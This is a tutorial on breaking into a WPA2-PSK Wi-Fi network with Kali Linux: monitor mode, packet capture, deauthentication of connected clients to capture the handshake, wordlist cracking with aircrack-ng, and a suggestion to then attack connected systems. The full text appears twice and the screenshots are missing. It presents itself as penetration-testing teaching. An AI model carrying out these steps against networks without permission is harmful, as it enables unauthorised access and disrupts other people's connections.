HACKING WPA2-PSK WITH KALI LINUX
A wireless network is a network that uses radio waves to connect computers and other like devices together. The implementation is done at the physical layer (Layer1) of the OSI model.
WPA2 (Wi-Fi Protected Access) is a wireless security protocol that makes use of AES encryption and CCMP, a TKIP replacement. It is stronger than the other wireless security protocols (WEP, WPA).
WPA2 pre-shared keys use passphrases. This is the weakness I will exploit to crack a WPA2 protected network and gain access to it. Doing so requires software and hardware resources, and patience. The success of such attacks can also depend on how active and inactive the users of the target network are. We are going to take a step-by-step look at how you can break WPA2 using Kali Linux.
Our attack tool is the aircrack suite of tools in Kali Linux and we will employ the sniffing method; this involves intercepting packets as they are transmitted over a network. If you feel you have the necessary skills, let’s begin:
These are things that you’ll need:
● A successful install of Kali Linux (which you can easily obtain).
● A wireless adapter capable of injection/monitor mode. Some computers have network cards capable of this from the factory.
● Be within the target network’s radius.
● A wordlist to attempt to “crack” the password once it has been captured.
● Time and patience.
If you have these, then roll up your sleeves and let’s see how secure your network is!
Important notice: Hacking into anyone’s Wi-Fi without permission is considered an illegal act or crime in most countries. We are performing this tutorial for the sake of penetration testing, hacking to become more secure, and I’m using my own test network and router.
Step 1:
Open a terminal and find the name of your wireless adapter, type iwconfig on a terminal. See the result. (here my wireless adapter is ‘wlan0’).
Your computer has a number of network adapters, so to scan one, you need to know its name. So there are basically the following things that you need to know:
●lo - loopback. Not important currently.
●eth - ethernet.
●wlan - This is what we want. Note the suffix associated.
Step 2:
Enable Monitor Mode
We use a tool called airmon-ng to create a virtual interface.
Type airmon-ng start followed by the interface name of your wireless card. Mine is wlan0, so my command would be: airmon-ng start wlan0.
Here our newly created virtual interface is called wlan0mon.
Step 3:
Capturing Packets.
We’ll use airodump-ng to capture packets in the air; this tool gathers data from all wireless packets within our reach.Airodump will now list all of the wireless networks, and a lot of useful information about them.
We will locate a network to hack (ensure that you hack only your network or the network you have permission to hack). Once you’ve spotted your network on the ever-populating list, hit Ctrl + C on your keyboard to stop the process. Note the channel of your target network.
To do this, type airodump-ng followed by the name of the new monitor interface (wlan0mon).
Our test network is “mask”.
You can also force the wireless card to scan and report all wireless networks in the vicinity using this command:
As you can see from the figure above, our target network (MASK) is also displayed.
Focus on the Target Network
Our next step is to focus our efforts on “mask”, and capture critical data from it. We need the BSSID and channel to do this. Let's open another terminal and type:
airodump-ng --bssid (BSSID of mask) -c [channel] --write [file you want to write to]
[interface]
As you can see in the screenshot above, we're now focusing on capturing data from one AP/router with an ESSID of Mask on channel 11.
Capture the handshake
We will leave the open airodump-ng screen to tell when we have a WPA2 handshake. In order to capture the encrypted password, we need to have the client authenticate against the AP/router. We need to catch a user in the act of authenticating to get a valid capture. Airodump-ng will display a valid handshake when it captures it. It will display the handshake confirmation in the upper right hand corner of the screen.
We also can de-authenticate them (kick them off) and their system will automatically re-authenticate, whereby we can grab their encrypted password in the 4- way handshake process.
The two scenarios:
1. waiting
What we’re really doing now is waiting for a device to connect. Once this happens, we get a handshake as shown below:
2. force re-authentication
Really don’t like waiting for a new device to connect, no, that’s not what impatient hackers do. We’re actually going to use another tool that belongs to the aircrack suite, called aireplay-ng, to achieve this. Instead of waiting for a device to connect, we will use this tool to force an already connected device to reconnect by sending deauthentication (deauth) packets to the client, thereby making it reconnect with the network.
Here we have a client already connected. Let's open another terminal and type:
● aireplay-ng --deauth [no. of deauth packets] -a [BSSID] [interface]
…and we have our handshake!
Also, four files should show up in your chosen airodump directory, this is where the handshake will be saved when captured, so don’t delete them!
Crack the Password
Here is the fun part! Now that we have the encrypted password in our file WPAPSKCRACK-01.cap, we can run that file against aircrack-ng using a password file of our choice. I created a customized wordlist called wordlist.txt with crunch, and will be using this to crack the encrypted password for mask. This wordlist is located on my desktop.
We'll now attempt to crack the password by opening another terminal and typing:
● aircrack-ng [captured packet file] –w [Absolute path to our wordlist)
Cracking the password might take a long time depending on the size of the wordlist. Mine went very quickly.Remember that this type of attack is only as good as your wordlist.
Here we are:
Proof Of Concept
Let’s try to login with the password we found:
As you can see, we are connected.
Note the channel (11).
Now that we are in the network, we can take the exploit further, as far as attacking the connected systems.
A wireless network is a network that uses radio waves to connect computers and other like devices together. The implementation is done at the physical layer (Layer1) of the OSI model.
WPA2 (Wi-Fi Protected Access) is a wireless security protocol that makes use of AES encryption and CCMP, a TKIP replacement. It is stronger than the other wireless security protocols (WEP, WPA).
WPA2 pre-shared keys use passphrases. This is the weakness I will exploit to crack a WPA2 protected network and gain access to it. Doing so requires software and hardware resources, and patience. The success of such attacks can also depend on how active and inactive the users of the target network are. We are going to take a step-by-step look at how you can break WPA2 using Kali Linux.
Our attack tool is the aircrack suite of tools in Kali Linux and we will employ the sniffing method; this involves intercepting packets as they are transmitted over a network. If you feel you have the necessary skills, let’s begin:
These are things that you’ll need:
● A successful install of Kali Linux (which you can easily obtain).
● A wireless adapter capable of injection/monitor mode. Some computers have network cards capable of this from the factory.
● Be within the target network’s radius.
● A wordlist to attempt to “crack” the password once it has been captured.
● Time and patience.
If you have these, then roll up your sleeves and let’s see how secure your network is!
Important notice: Hacking into anyone’s Wi-Fi without permission is considered an illegal act or crime in most countries. We are performing this tutorial for the sake of penetration testing, hacking to become more secure, and I’m using my own test network and router.
Step 1:
Open a terminal and find the name of your wireless adapter, type iwconfig on a terminal. See the result. (here my wireless adapter is ‘wlan0’).
Your computer has a number of network adapters, so to scan one, you need to know its name. So there are basically the following things that you need to know:
●lo - loopback. Not important currently.
●eth - ethernet.
●wlan - This is what we want. Note the suffix associated.
Step 2:
Enable Monitor Mode
We use a tool called airmon-ng to create a virtual interface.
Type airmon-ng start followed by the interface name of your wireless card. Mine is wlan0, so my command would be: airmon-ng start wlan0.
Here our newly created virtual interface is called wlan0mon.
Step 3:
Capturing Packets.
We’ll use airodump-ng to capture packets in the air; this tool gathers data from all wireless packets within our reach.Airodump will now list all of the wireless networks, and a lot of useful information about them.
We will locate a network to hack (ensure that you hack only your network or the network you have permission to hack). Once you’ve spotted your network on the ever-populating list, hit Ctrl + C on your keyboard to stop the process. Note the channel of your target network.
To do this, type airodump-ng followed by the name of the new monitor interface (wlan0mon).
Our test network is “mask”.
You can also force the wireless card to scan and report all wireless networks in the vicinity using this command:
As you can see from the figure above, our target network (MASK) is also displayed.
Focus on the Target Network
Our next step is to focus our efforts on “mask”, and capture critical data from it. We need the BSSID and channel to do this. Let's open another terminal and type:
airodump-ng --bssid (BSSID of mask) -c [channel] --write [file you want to write to]
[interface]
As you can see in the screenshot above, we're now focusing on capturing data from one AP/router with an ESSID of Mask on channel 11.
Capture the handshake
We will leave the open airodump-ng screen to tell when we have a WPA2 handshake. In order to capture the encrypted password, we need to have the client authenticate against the AP/router. We need to catch a user in the act of authenticating to get a valid capture. Airodump-ng will display a valid handshake when it captures it. It will display the handshake confirmation in the upper right hand corner of the screen.
We also can de-authenticate them (kick them off) and their system will automatically re-authenticate, whereby we can grab their encrypted password in the 4- way handshake process.
The two scenarios:
1. waiting
What we’re really doing now is waiting for a device to connect. Once this happens, we get a handshake as shown below:
2. force re-authentication
Really don’t like waiting for a new device to connect, no, that’s not what impatient hackers do. We’re actually going to use another tool that belongs to the aircrack suite, called aireplay-ng, to achieve this. Instead of waiting for a device to connect, we will use this tool to force an already connected device to reconnect by sending deauthentication (deauth) packets to the client, thereby making it reconnect with the network.
Here we have a client already connected. Let's open another terminal and type:
● aireplay-ng --deauth [no. of deauth packets] -a [BSSID] [interface]
…and we have our handshake!
Also, four files should show up in your chosen airodump directory, this is where the handshake will be saved when captured, so don’t delete them!
Crack the Password
Here is the fun part! Now that we have the encrypted password in our file WPAPSKCRACK-01.cap, we can run that file against aircrack-ng using a password file of our choice. I created a customized wordlist called wordlist.txt with crunch, and will be using this to crack the encrypted password for mask. This wordlist is located on my desktop.
We'll now attempt to crack the password by opening another terminal and typing:
● aircrack-ng [captured packet file] –w [Absolute path to our wordlist)
Cracking the password might take a long time depending on the size of the wordlist. Mine went very quickly.Remember that this type of attack is only as good as your wordlist.
Here we are:
Proof Of Concept
Let’s try to login with the password we found:
As you can see, we are connected.
Note the channel (11).
Now that we are in the network, we can take the exploit further, as far as attacking the connected systems.